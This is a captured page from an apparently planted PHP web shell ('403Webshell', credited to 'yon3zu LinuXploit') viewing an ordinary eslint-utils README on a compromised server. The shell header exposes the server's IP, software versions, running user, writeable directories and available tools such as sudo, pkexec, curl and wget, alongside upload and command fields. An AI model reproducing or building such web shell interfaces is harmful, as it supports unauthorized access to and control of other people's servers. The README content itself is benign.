403Webshell
Server IP : 107.13.46.68  /  Your IP : 216.73.216.232
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux mariOS 6.8.0-51-generic #52-Ubuntu SMP PREEMPT_DYNAMIC Thu Dec 5 13:09:44 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/node-eslint-utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/node-eslint-utils/README.html
<h1>eslint-utils</h1>
<h2>🏁 Goal</h2>
<p>This package provides utility functions and classes for make ESLint custom rules.</p>
<p>For examples:</p>
<ul>
<li><a href="https://eslint-utils.mysticatea.dev/api/ast-utils.html#getstaticvalue">getStaticValue</a> evaluates static value on AST.</li>
<li><a href="https://eslint-utils.mysticatea.dev/api/scope-utils.html#referencetracker-class">ReferenceTracker</a> checks the members of modules/globals as handling assignments and destructuring.</li>
</ul>
<h2>📖 Usage</h2>
<p>See <a href="https://eslint-utils.mysticatea.dev/">documentation</a>.</p>
<h2>📰 Changelog</h2>
<p>See <a href="https://github.com/mysticatea/eslint-utils/releases">releases</a>.</p>
<h2>❤️ Contributing</h2>
<p>Welcome contributing!</p>
<p>Please use GitHub's Issues/PRs.</p>
<h3>Development Tools</h3>
<ul>
<li><code>npm test</code> runs tests and measures coverage.</li>
<li><code>npm run clean</code> removes the coverage result of <code>npm test</code> command.</li>
<li><code>npm run coverage</code> shows the coverage result of the last <code>npm test</code> command.</li>
<li><code>npm run lint</code> runs ESLint.</li>
<li><code>npm run watch</code> runs tests on each file change.</li>
</ul>

Youez - 2016 - github.com/yon3zu
LinuXploit